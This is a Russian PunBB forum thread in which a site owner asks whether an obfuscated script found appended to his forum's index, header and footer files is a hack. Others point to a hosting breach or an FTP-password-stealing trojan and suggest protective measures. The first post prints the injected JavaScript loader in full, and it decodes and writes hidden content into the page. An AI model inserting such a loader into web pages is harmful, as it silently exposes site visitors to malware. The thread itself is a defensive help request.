Это взлом или?

flashcat · 21.08.2009 17:51

flashcat
Мастер
Неактивен

Зарегистрирован: 02.11.2006
Сообщений: 349
Репутация : [ 1 | 0 ]

Тема: Это взлом или?

Сегодня ночью упала сразу 2 форума, ну то есть один общий и один мой где я все тестирую.
В коде index.php, header.php, footer.php нашол в конце страниц вот такой скрипт откуда он там мог взяться ума не прилажу тем более сразу на 2х форумах. Вот пришол к вам за помощью что это и откуда могло взяться. Сначала думал может реклама какая то, но потом на чистом форуме (тот что тестовый) нашол тоже самое. Появилось подозрение что какой то эксплойт придумали.

<script>function B68BB6b68b686bb8B88b88Bb6bBBBb6bB88bb6B6(bB8b8666bbBB6B868666B6Bbb68886866BbbBBB8){var b8BbBBbbBbbbbbBb86688BB68bb66866bBBbBb8B=bB8b8666bbBB6B868666B6Bbb68886866BbbBBB8.length,bBbBbbbBbb86b88BBBBB6B6BB6bBbBBBBbB8688B=1024,bB6b688688Bb66b6666B66bBb88bBbbBbB8b6bbb,Bb86BB8BBbBBb8B6B6BbBb888b6b8b6888b66666,b6b668BB6bBB8b66B6BBb668Bb6b68bbb8bbBbb6,bb68bbbBBB6bB68b8bBbB8bB68866888BbBb68b6=0,BBB6B6B6bbBb6888BB866b8688bbB6b6B86bbBB8=0,bbBB666668686b88B66B8bB666BB6B6BbBbb6BB8=0,bBb886B86B6bbBBBBBbBbBb6b8BB6b66bbbBB866=Array(63,46,40,56,55,21,32,16,31,20,0,0,0,0,0,0,47,57,6,58,12,23,35,44,3,18,4,17,9,41,42,38,49,61,5,43,39,8,52,62,14,28,50,0,0,0,0,59,0,24,34,53,22,19,33,30,7,2,10,0,13,29,54,45,26,25,60,51,15,27,1,36,48,11,37);for(Bb86BB8BBbBBb8B6B6BbBb888b6b8b6888b66666=Math.ceil(b8BbBBbbBbbbbbBb86688BB68bb66866bBBbBb8B/bBbBbbbBbb86b88BBBBB6B6BB6bBbBBBBbB8688B);Bb86BB8BBbBBb8B6B6BbBb888b6b8b6888b66666>0;Bb86BB8BBbBBb8B6B6BbBb888b6b8b6888b66666--){b6b668BB6bBB8b66B6BBb668Bb6b68bbb8bbBbb6='';            
for(bB6b688688Bb66b6666B66bBb88bBbbBbB8b6bbb=Math.min(b8BbBBbbBbbbbbBb86688BB68bb66866bBBbBb8B,bBbBbbbBbb86b88BBBBB6B6BB6bBbBBBBbB8688B);bB6b688688Bb66b6666B66bBb88bBbbBbB8b6bbb>0;bB6b688688Bb66b6666B66bBb88bBbbBbB8b6bbb--,b8BbBBbbBbbbbbBb86688BB68bb66866bBBbBb8B--){bbBB666668686b88B66B8bB666BB6B6BbBbb6BB8|=(bBb886B86B6bbBBBBBbBbBb6b8BB6b66bbbBB866[bB8b8666bbBB6B868666B6Bbb68886866BbbBBB8.charCodeAt(bb68bbbBBB6bB68b8bBbB8bB68866888BbBb68b6++)-48])<<BBB6B6B6bbBb6888BB866b8688bbB6b6B86bbBB8;if(BBB6B6B6bbBb6888BB866b8688bbB6b6B86bbBB8){b6b668BB6bBB8b66B6BBb668Bb6b68bbb8bbBbb6+=String.fromCharCode(134^bbBB666668686b88B66B8bB666BB6B6BbBbb6BB8&255);bbBB666668686b88B66B8bB666BB6B6BbBbb6BB8>>=8;BBB6B6B6bbBb6888BB866b8688bbB6b6B86bbBB8-=2}else{BBB6B6B6bbBb6888BB866b8688bbB6b6B86bbBB8=6}}document.write(b6b668BB6bBB8b66B6BBb668Bb6b68bbb8bbBbb6)}}B68BB6b68b686bb8B88b88Bb6bBBBb6bB88bb6B6("CWX3V8WCFupQVEW1wC1rZut@MOp3VTW_sytNzFgNcTC_2FpAf0g14pyMOB0_by@__INowpN_F0g31y01wpyMOd@r0SW3_IN3@E@QN8W0rbgC2tXM3NuN@HXQT@W33i")       
</script>

hcs · 21.08.2009 18:05

hcs
Заслуженый флудер
Неактивен

Откуда: СССР
Зарегистрирован: 10.02.2006
Сообщений: 4,740
Репутация : [ 112 | 0 ]

Re: Это взлом или?

Обычно так хостеров ломают. Напиши в службу поддержки, наверняка она уже завалена жалобами.
Какая версия форумов?

+ wcw2007

flashcat · 21.08.2009 20:18

flashcat
Мастер
Неактивен

Зарегистрирован: 02.11.2006
Сообщений: 349
Репутация : [ 1 | 0 ]

Re: Это взлом или?

Спасибо, попробую написать.
А самому защититься от этого ни как нельзя?
версия PunBB 1.3.4

hcs · 21.08.2009 23:34

hcs
Заслуженый флудер
Неактивен

Откуда: СССР
Зарегистрирован: 10.02.2006
Сообщений: 4,740
Репутация : [ 112 | 0 ]

Re: Это взлом или?

Если ломают хостера, то как ты можешь защититься? Только сменить хостера на того, которого не ломают.
Здесь уже не раз подымались темы с подобными проблемами, как правило виноват хостер. Реже - сам пользователь, у которого угнали пароли. Еще реже виноват движок. Могут быть проблемы с неофициальными расширениями. Попробуй сменить все пароли на хостинге, на фтп, на панель и тп.
Кто хостер? Практика показывает, что такой проблемой чаще всего страдают мелкие реселлеры и новоявленные хостеры без опыта администрирования серверов, без имени, телефона, юридического адреса и офиса.

flashcat · 22.08.2009 00:21

flashcat
Мастер
Неактивен

Зарегистрирован: 02.11.2006
Сообщений: 349
Репутация : [ 1 | 0 ]

Re: Это взлом или?

хостер dreamhost, уже 4й год на нем.
А вот пароли может быть, есть не большой процент этого. Но тогда какой то странный взлом. Задеты только форумы, сайт написанный в ручную ни как не затронут. Скорее всего сервер у хостера взломали(((
Расширения вроде не трогал неделю где-то, а вирусы полезли сегодня ночью.
Исходя из этого либо сервер взломали, либо именно punbb. Так как затронуло только форумы.

Добавлено спустя 25 минут 43 секунды:

Порылся в интернете, секюритилаб утверждает что уязвимость была только в 1.3.2 .
А у хостера про взлом не слова только то что они сервера переносили, и ставили новое ПО.
Вот и откуда ноги растут не понятно.
Писать придётся видимо хостерам.
Да и почему тогда только форумы тоже не ясно.

hcs · 22.08.2009 04:28

hcs
Заслуженый флудер
Неактивен

Откуда: СССР
Зарегистрирован: 10.02.2006
Сообщений: 4,740
Репутация : [ 112 | 0 ]

Re: Это взлом или?

Какие стоят расширения?

flashcat · 22.08.2009 12:43

flashcat
Мастер
Неактивен

Зарегистрирован: 02.11.2006
Сообщений: 349
Репутация : [ 1 | 0 ]

Re: Это взлом или?

Title: PunBB Repository Enabled
Version: 1.2.2
Author: PunBB Development Team
Description: Feel free to download and install extensions from PunBB repository.

Title: Admin add user Enabled
Version: 1.1.1
Author: PunBB Development Team
Description: Admin may add new user using the form in the bottom of User list.

Title: Private Messaging Enabled
Version: 1.2.6
Author: PunBB Development Team
Description: Allows users to send private messages. This is the first simple version with minimum functions.

Title: Birthdays Enabled
Version: 1.2.1
Author: Gizzmo
Description: Adds Birthday field to users profile.

Title: PunBB AnyCode Hook Manager Enabled
Version: 1.0.0 Beta 2
Author: hcs
Description: Hook Manager Developer Tool

Title: ChatLite Enabled
Version: 0.6.0
Author: Neck - www.eikylon.net, Modified by slickpl
Description: Adds a javascript chat to the forum index.

Title: hide urls for guests Enabled
Version: 0.1
Author: kierownik
Description: This extension hides all the urls in posts for guests.

Title: Show (Some) User info Enabled
Version: 1.0.2
Author: Garciat
Description: Lets you decide what user info to show.

Title: VideoTag Enabled
Version: 0.2.0
Author: Neck - www.eikylon.net
Description: New BBcode tag ([video]) to display embedded flash videos.

Title: Pun poll Enabled
Version: 1.1.2
Author: PunBB Development team
Description: Adds polls feature for topics.

Title: Add shortcut to latest registered users Enabled
Version: 1.2
Author: YonasH
Description: Add shortcut to latest registered users to forum footer. Set button availability in Administration/Settings/Features.

Title: Countdown Enabled
Version: 0.2.1
Author: Neck - www.eikylon.net
Description: Adds possibility to display a countdown in annoucement. Use: <span class="ek_countdown">12/31/2008 23:59 UTC</span>.

Title: DivxBBcode Enabled
Version: 1.0.0
Author: KeyDog
Description: Adds DivXBBCodes to allow divx embeding on your forum.

Title: thanks Enabled
Version: 0.4.beta
Author: KANekT
Description: This extension lets your members thank someone for a post they posted.

Title: XML Backup Enabled
Version: 1.1
Author: Garciat
Description: Allows the creation of database backups in XML format.

Title: Default Avatar Enabled
Version: 1.0
Author: Garciat
Description: Allows the use of a default avatar in case an avatar is not set.

Title: Antispam System Enabled
Version: 1.2
Author: PunBB Development Team
Description: Adds CAPTCHA to the register, login and guest post form.

Title: Pun Admin Manage Extensions Improved Enabled
Version: 1.4
Author: PunBB Development Team
Description: This extension allows to choose several extensions to enable/disable/uninstall them

Title: Group Images Beta Enabled
Version: 0.5
Author: Rich Pedley
Description: WARNING: use at your own risk (written for 1.3 beta) Adds images for user groups based on number of posts. Set images on the Users > Groups page. Set number to display on the Users > Ranks page.

Title: MP3 Player Enabled
Version: 1.0
Author: Extension: downliner Original Script: Yahooooooooo
Description: * Adds audio to your site with one line of HTML * Magical floating design never gets lost, is available when you need it, gets out of your way when you don't need it * Automatically finds all audio links on your page, turning your page into a playlist * Allows you to put the play buttons where they belong: IN CONTEXT * Keeps the user in the page rather than sending them away to a media player * Picks up your images and adds them as cover art

Title: Genders Enabled
Version: 1.0
Author: Garciat
Description: Allows users to choose their gender from a custom list.

Title: Smilies Enabled
Version: 1.0
Author: Garciat
Description: Integrates an improved smilies system.

Title: Improved online list Enabled
Version: 1.3
Author: YonasH
Description: Add new facilities to online list. Configurable in Administration > Settings > Features.

Title: BBCode buttons Enabled
Version: 1.2.1
Author: PunBB Development Team
Description: Pretty buttons for easy BBCode formatting.

Title: Userlist Avatar Enabled
Version: 1.0.5
Author: kierownik
Description: Adds avatar to the userlist.

Title: List Extensions Enabled
Version: 1.0.4
Author: kierownik
Description: This extension lets you generate Your list of extensions that you can post on your forum.

Title: Forum Fixes and Images Beta Enabled
Version: 0.3
Author: Rich Pedley
Description: WARNING: use at your own risk (written for 1.3 beta) Correcting some minor forum code for css, and adding images.

Title: BBCode Extended Enabled
Version: 0.1
Author: Rich Pedley
Description: This extension adds extra BBCode tags.

Title: BBCode

Enabled
Version: 0.1.0
Author: •ROOT• - www.thugzfamily.com
Description: A new BBcode tag to center text.

Title: FlvBBcode Enabled
Version: 1.0.0
Author: KeyDog
Description: Adds FLV BBCodes to allow FLV embeding on your forum. Users just need to put it URL of file and add the bbCode FLV. Tweaking to parameters see www.longtailvideo.com/players/jw-flv-player/

Title: BBcode [size] Enabled
Version: 0.1
Author: •ROOT• - ThugzFamily
Description: [size] tag support

Title: anycode title Enabled
Version: 0.0.0
Author: author
Description: This is part of AnyCode extension

Title: Latest posts on profile Enabled
Version: 1.0.2
Author: Garciat
Description: Shows the user's latest posts on his/her profile.

Title: jQuery (YonasH) Enabled
Version: 1.3
Author: YonasH
Description: Adds jQuery scripts to forum. Used in some my extensions.

Title: Slimbox for postimg Enabled
Version: 1.0
Author: YonasH
Description: Big post images are displayed in slimbox. Require jquery_y extension (rapidshare.com/files/190370698/j … 3.zip.html).

Title: PunBB javascript helper Enabled
Version: 1.0.0
Author: hcs
Description: This extension provide helps developers to add calls
javascript for the extension.

Title: DL HTML user Enabled
Version: 1.0
Author: Ипатьев (De-Luxis) Степан c помощью Ильи (Flazy)
Description: Позволяет вставлять html код, в профиль пользователей (под аватаром).
Внимание! Тестировалось только на сборке Flazy: flazy.ru

Title: Portal Enabled
Version: 3.0.1
Author: Daris
Description: Adds a portal to forum

Title: IP To Country Enabled
Version: 0.1
Author: Grant Petersen
Description: This extension does nothing on its own but makes the function iptocountry() available for other extensions.

Title: Member Flags Enabled
Version: 0.1
Author: Grant Petersen
Description: This extension adds each member's flag below their sig.

Title: Hidden code Enabled
Version: 1.0
Author: daris
Description: Hides code tag for guests.

Title: anycode title Enabled
Version: 0.0.0
Author: author
Description: This is part of AnyCode extension

Title: Subforums Enabled
Version: 0.9kanekt0
Author: Sergey Leschina
Description: Options in Administration » Settings » Features.

Title: Moderation Log Enabled
Version: 0.5
Author: The HungryCoder
Description: Log moderators activities

Title: profile_fields Enabled
Version: 0.1.8
Author: dimka.linux@gmail.com
Description: Add Skype field in profile.

Title: Fancy Merge Posts Enabled
Version: 0.1.42
Author: dimka.linux@gmail.com
Description: Automaticaly merge posts from one author

Title: Show links in new window Enabled
Version: 1.1
Author: YonasH
Description: Open all links from posts, signatures and user websites in new windows

Title: Last Topic Title Enabled
Version: 0.1.55
Author: dimka.linux@gmail.com
Description: Show last posts title on index page

Title: Events registration Enabled
Version: 0.8.1
Author: PunBB Development Team
Description: Adds an gear to logging events and GUI for browsing logs.

Title: Logging of events Enabled
Version: 1.0
Author: PunBB Development Team
Description: Logs a lot of forum's events.

Title: GeorgeH Custom Extension Enabled
Version: 1.0
Author: Garciat
Description: Customized title for forum/topic pages.

Title: link_new_pun_pm Enabled
Version: 0.1
Author: •ROOT•
Description: Смена линка в новых сообщениях

Title: Attachment Enabled
Version: 1.0a.1
Author: PunBB Development Team
Description: Allows you to attach files to posts.

Вот вывел все включенные

Щас, узнал что у друзей на сайте тот же самый вирус, а хостер у них руцентер вроде. Это типа походу какой то массовый взлом потому что у них там ваще инет магазин а не форум.
Может через какие то дыры пролезает? Так что на всякий выложу расширения. Может в них где дыра.

Studia · 22.08.2009 23:15

Studia
Интересующийся
Неактивен

Откуда: Курск
Зарегистрирован: 11.04.2009
Сообщений: 54
Репутация : [ 5 | 0 ]

Re: Это взлом или?

Да-да, страдают файлы index.* . В подавляющем большинстве проблема в хранении паролей доступа в FTP-клиенте. Этому червячку хрен знает скока лет уже.

flashcat · 23.08.2009 01:47

flashcat
Мастер
Неактивен

Зарегистрирован: 02.11.2006
Сообщений: 349
Репутация : [ 1 | 0 ]

Re: Это взлом или?

О, ого спасибо, я во общем пароли то сменил. А как клиенты от этого защитить???
И все таки проблема могла еще быть у хостера, у них был там трабл какой то с софтом на сервере, сегодня ночью вроде всё восстановили.
И всё таки как защитить ФТП от таких вот посягательств?
Я в инете искал, но по тому что я о нем знаю инфы не нашол... как защищаться...

hcs · 23.08.2009 05:13

hcs
Заслуженый флудер
Неактивен

Откуда: СССР
Зарегистрирован: 10.02.2006
Сообщений: 4,740
Репутация : [ 112 | 0 ]

Re: Это взлом или?

Троян на домашнем компе ворует пароли тотал-командера и других файл-менеджеров.
Меры защиты: файрвол, антивирус, благоразумие, альтернативный браузер иексплореру с дефолтовым отключением js, скачивание с проверенных ресурсов, запуск неизвестных приложений с неизвестных ресурсов с сомнительным содержанием в изолированной среде (например не под администратором), регулярный мониторинг открытых портов, исходящих соединений, процессов, загруженных библиотек, проверка антируткитами.

Jesus Ophis · 17.01.2011 22:10

Jesus Ophis
Libertarian
Неактивен

Зарегистрирован: 17.01.2011
Сообщений: 5
Репутация : [ 0 | 0 ]

Re: Это взлом или?

flashcat пишет:

Title: BBcode [size] Enabled
Version: 0.1
Author: •ROOT• - ThugzFamily
Description: [size] tag support

Скажите пожалуйста, это расширение у вас ещё стоит? Работоспособно?
Если да, то не поделитесь?

Пробовал [size] tag 0.01 от Pepak, но у меня не работает. А поддержку тега размера очень хочется.

KANekT · 20.01.2011 00:49

KANekT
Разработчик
Неактивен

Откуда: Брежнев
Зарегистрирован: 11.03.2008
Сообщений: 873
Репутация : [ 59 | 0 ]

Re: Это взлом или?

BBcode kanekt-punbb.googlecode.com/files/nya_bbcode.zip

но там много тегов сразу...

Блог | GitHub

Это взлом или?

Сообщений 12

1 Тема от flashcat 21.08.2009 17:51

Тема: Это взлом или?

2 Ответ от hcs 21.08.2009 18:05

Re: Это взлом или?

3 Ответ от flashcat 21.08.2009 20:18

Re: Это взлом или?

4 Ответ от hcs 21.08.2009 23:34

Re: Это взлом или?

5 Ответ от flashcat 22.08.2009 00:21 (22.08.2009 00:47 отредактировано flashcat)

Re: Это взлом или?

6 Ответ от hcs 22.08.2009 04:28

Re: Это взлом или?

7 Ответ от flashcat 22.08.2009 12:43

Re: Это взлом или?

8 Ответ от Studia 22.08.2009 23:15

Re: Это взлом или?

9 Ответ от flashcat 23.08.2009 01:47 (23.08.2009 01:49 отредактировано flashcat)

Re: Это взлом или?

10 Ответ от hcs 23.08.2009 05:13

Re: Это взлом или?

11 Ответ от Jesus Ophis 17.01.2011 22:10

Re: Это взлом или?

12 Ответ от KANekT 20.01.2011 00:49

Re: Это взлом или?

Сообщений 12

Просматривают тему: 1 гость, 0 пользователей --